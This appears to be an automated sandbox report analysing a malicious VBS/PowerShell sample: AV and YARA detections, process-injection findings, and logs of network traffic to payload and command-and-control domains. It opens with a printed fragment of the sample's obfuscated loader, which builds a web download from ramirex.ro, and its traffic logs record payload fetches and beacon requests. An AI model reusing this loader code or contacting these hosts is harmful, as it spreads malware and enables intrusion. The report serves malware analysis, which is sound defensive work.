odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlu
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Source: IMG-466573885783553Folketingsmedlemmers.vbsReversingLabs: Detection: 13%
          Source: IMG-466573885783553Folketingsmedlemmers.vbsVirustotal: Detection: 14%Perma Link
          Source: Yara matchFile source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.7:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.7:49707 version: TLS 1.2
          Source: Binary string: m.Core.pdbH\ source: powershell.exe, 0000000E.00000002.1648566451.0000000002A8A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1659572964.0000000008277000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ll\System.Core.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082D7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1740507459.000000002216D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1744163245.000000002231B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1740507459.000000002216D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1744163245.000000002231B000.00000004.00000020.00020000.00000000.sdmp, clip.exe
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: clip.pdb source: wab.exe, wab.exe, 00000012.00000003.1809432291.0000000006ACC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866261345.0000000006A7C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000E.00000002.1648566451.0000000002AC9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: clip.pdbGCTL source: wab.exe, 00000012.00000003.1809432291.0000000006ACC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866261345.0000000006A7C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\symbols\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082D7000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021BB830 FindFirstFileW,FindNextFileW,FindClose,22_2_021BB830

          Software Vulnerabilities

          barindex
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax22_2_021A9320
          Source: Joe Sandbox ViewIP Address: 137.220.252.40 137.220.252.40
          Source: Joe Sandbox ViewIP Address: 193.37.145.73 193.37.145.73
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /Rutschebanes.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ramirex.roConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /HtwvlcDSFcrAhhcHdD97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ramirex.roCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /abt9/?Of5HNz9=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP6hUKp5Wb66wssc3rTHo+fACwEvPa+X6vTXJYKXAx7rcdiqsO+f3J/gP&HvxX=KFLDJ HTTP/1.1Host: www.387mfyr.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /abt9/?Of5HNz9=iV9adYjvPp7RuLwaP6BmForAyDRLfg4mpsRDBpobO1h4QpcDO6+h8uyV1/sip+su221s2KGGsEsC4t0dUTAnOg7+9cTY95M3z71wQoeHgy2DqTBwSPZzUbg36nzdDZOI6y7kx7FtYrhA&HvxX=KFLDJ HTTP/1.1Host: www.led-svitidla.euAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /abt9/?Of5HNz9=U+tTJKHHkznvwAdOTVuKaX3FkVtJQL73z6Knbsq9f/vaKulnAbb7PLKV5/tS55IHZlIFY34dfjld794ib/iuaW0ctDHRV5MOwCy1+9JCA1F7uH49s/OETdfla7HVUoCSmFvZju33t//s&HvxX=KFLDJ HTTP/1.1Host: www.beldecor.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficDNS traffic detected: DNS query: ramirex.ro
          Source: global trafficDNS traffic detected: DNS query: www.387mfyr.sbs
          Source: global trafficDNS traffic detected: DNS query: www.led-svitidla.eu
          Source: global trafficDNS traffic detected: DNS query: www.andywork.one
          Source: global trafficDNS traffic detected: DNS query: www.slamdrops.com
          Source: global trafficDNS traffic detected: DNS query: www.beldecor.net
          Source: unknownHTTP traffic detected: POST /abt9/ HTTP/1.1Host: www.led-svitidla.euAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.led-svitidla.euReferer: http://www.led-svitidla.eu/abt9/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 4f 66 35 48 4e 7a 39 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 68 72 59 53 48 71 56 6b 46 49 6a 66 6a 58 31 7a 64 41 46 31 70 63 52 76 45 5a 73 41 66 46 46 36 65 72 67 6b 49 59 71 6b 2b 2f 6a 62 38 63 63 37 69 2b 59 59 34 6a 31 42 78 4b 33 6c 6d 6d 34 4f 34 74 34 62 59 33 4a 54 4a 55 6a 4e 70 63 6a 61 2f 4e 45 69 79 4a 5a 6f 63 72 69 36 67 51 61 51 7a 6a 73 77 53 4f 39 64 42 73 74 46 6d 45 50 50 4e 75 4b 57 38 68 33 52 34 4c 4e 69 56 73 46 47 34 6b 78 62 71 58 4e 2b 34 59 45 46 70 6b 45 62 30 62 62 4f 2b 32 6e 45 4f 78 38 61 7a 37 6d 35 48 50 53 61 39 6b 38 71 70 6f 71 4c 32 4c 6b 36 77 52 4d 62 34 33 49 37 30 4d 6f 45 65 48 72 51 77 59 54 4e 51 67 3d 3d Data Ascii: Of5HNz9=vXV6eoPdJ47RhrYSHqVkFIjfjX1zdAF1pcRvEZsAfFF6ergkIYqk+/jb8cc7i+YY4j1BxK3lmm4O4t4bY3JTJUjNpcja/NEiyJZocri6gQaQzjswSO9dBstFmEPPNuKW8h3R4LNiVsFG4kxbqXN+4YEFpkEb0bbO+2nEOx8az7m5HPSa9k8qpoqL2Lk6wRMb43I70MoEeHrQwYTNQg==
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 01 Jun 2024 17:58:52 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:08 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:11 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:13 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:16 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 62 c7 dd 66 53 db 40 1b bb 88 81 b4 09 12 15 45 8e 14 39 b2 88 50 a4 4a 52 51 0c ec 1f ca 79 7f 42 fe d8 0e 45 3b 9b 7e 9d 64 92 f3 de 9b 79 33 e3 f9 9b d5 d5 79 71 77 bd 86 8b e2 f3 25 5c 7f fd 78 b9 39 87 24 cd f3 6f 27 e7 79 be 2a 56 f1 61 96 1d 4f f2 7c fd 25 81 a4 f6 be 3d cb f3 be ef b3 fe 24 33 76 9b 17 37 79 ed 1b 35 cb 9d b7 92 fb 4c 78 91 2c 47 f3 70 07 8a e9 ed 22 a9 ec 70 81 4c d0 7d 83 9e 41 60 49 f1 7b 27 1f 16 c9 b9 d1 1e b5 4f 8b 5d 8b 09 f0 78 5a 24 1e 1f fd 40 fc 1e 78 cd ac 43 bf e8 7c 95 9e 06 aa 81 43 b3 06 17 89 35 a5 f1 ee 15 4e 1b 8d 63 6d a4 16 f8 48 df ca 28 65 fa 17 d0 6b 61 ce 78 8d 69 10 b4 46 fd c0 90 0e 4f bf 05 b5 96 6d 1b f6 87 e8 62 53 5c ae 97 b3 e3 19 7c 31 1e 3e 99 4e 8b 79 1e 2f 47 f3 fc 62 fd 61 45 c9 7f bc 5a dd d1 e7 62 b2 7c 15 44 a7 51 51 23 58 32 05 9d 47 01 c2 f0 ae 21 5f a0 67 0e 34 d1 55 81 0e 8c 06 5f 4b 07 0e ed 03 da 6c 34 bf 0e 5c 37 07 42 0d 85 35 dd c3 f3 13 c9 11 e5 25 fe cf 23 b0 61 5a 3c 3f 81 3e 62 d0 12 e9 f3 93 a7 13 15 1f e2 c1 75 16 38 46 de ee 57 62 58 eb c1 29 26 4c a4 5e ab 17 6a 03 ce 28 c9 a5 a7 47 4a 95 38 00 63 f4 f3 bf f4 0b 42 41 03 b1 14 e6 07 e6 0f ab d5 cd fa f6 76 39 fa 86 25 dc 0e 15 01 a3 8a 69 b8 4a 54 02 39 85 6b f4 00 ff 00 5c 9b 1e 2d f9 52 ee 86 77 d5 bb ac b2 c3 cb 66 75 06 25 17 6f 8f d9 e9 64 86 ec a4 9c 4e 4f 67 ef c4 c9 5f bc 9c 4e fe 2e df f1 e9 f1 84 ec 7f 11 9b e7 fb 16 e4 61 ea 97 a3 d1 fc 4d 9a 8e 00 20 85 af ba 32 d6 77 9a 79 54 bb 31 7c 96 dc 1a 67 2a 0f 35 f9 c5 84 20 7d 06 5c 21 59 0f 1a fb 08 4a 2a 64 be b3 34 bc de c0 86 86 d9 86 9c d7 8f ad 32 96 5a 04 9b 8a 5a 86 10 06 1a 4c 15 31 8c 5c b1 d6 d8 23 07 0d 3a c7 b6 08 d4 d4 c4 1b 72 af 61 4a 25 63 70 2d 72 59 49 4e a7 5d 04 29 8a 24 2a c2 be 9d 4c c9 08 8f 6e fc ab 20 cd 10 65 a3 5d c4 48 ef c0 f4 7b b5 83 56 06 77 a6 03 4e 44 21 32 50 86 cc aa 71 84 94 9d 07 e9 29 b3 96 98 fc 8e 26 44 f2 7b fa 18 a8 68 ab c0 f5 d2 f3 9a d0 4a a1 88 88 84 72 b6 3e 56 74 d0 70 49 06 45 20 6e 90 69 ca d3 54 b4 db 1d ed f1 5e 65 10 75 35 d9 fd 13 0e 98 45 9a 44 ed c8 bd a1 dd 02 2b d6 29 9f 45 ad cd e6 16 98 ea d9 ce 1d 0a fd 19 3f 30 07 12 65 f4 36 82 50 9b 6e 5b 87 12 1a 76 8f bf f1 ac 66 6d bb 0b 09 63 04 f4 c6 de 33 da 0c aa 97 fa b2 37 c2 c9 a6 55 78 46 cb 23 86 8e 0e 1d 8c f1 87 26 92 37 35 8d 48 29 b7 54 6d 33 ec af 92 a4 38 ec 2c c9 b7 9d ab c9 dc 08 32 61 8c c2 68 54 f2 01 a1 26 b1 50 31 2d 29 f8 1e 15 5d 0d 2d 86 46 6a d9 74 cd be fe ab 17 1f 87 be 51 9b f0 91 71 af 68 2d 82 db 3b d3 1d 51 e9 96 fe 6c e5 a1 7a 2b b7 b5 a7 c5 ec 23 45 ba 1c fd 07 3d 98 bb 21 f9 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 36buTMo8WLubfS@E9PJRQyBE;~dy3yqw%\x9$o'y*VaO|%=$3v7y5Lx,Gp"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 b2 ec d8 5b b4 a9 6d a0 8d bd 88 81 b4 09 12 15 45 8e b4 38 b2 88 50 a4 96 1c 45 31 d0 3f 94 f3 fe 84 fc b1 1d 8a 76 9a 7e ec 49 26 39 ef bd 99 37 33 9e bf 59 5d 9d e7 77 d7 6b b8 c8 3f 5f c2 f5 d7 4f 97 9b 73 48 d2 2c fb 36 3d cf b2 55 be 8a 0f b3 d1 78 92 65 eb 2f 09 24 15 51 73 96 65 5d d7 8d ba e9 c8 ba 5d 96 df 64 15 d5 7a 96 79 72 aa a0 91 24 99 2c 07 f3 70 07 5a 98 dd 22 29 5d 7f 81 42 f2 7d 8d 24 20 b0 a4 f8 4f ab 1e 16 c9 b9 35 84 86 d2 7c df 60 02 45 3c 2d 12 c2 47 ea 89 3f 40 51 09 e7 91 16 2d 95 e9 bb 40 d5 73 18 51 e3 22 71 76 6b c9 bf c2 19 6b 70 68 ac 32 12 1f f9 5b 5a ad 6d f7 02 7a 2d 5c 88 a2 c2 34 08 3a ab 7f 62 48 fb a7 3f 82 1a 27 76 b5 f8 9f e8 7c 93 5f ae 97 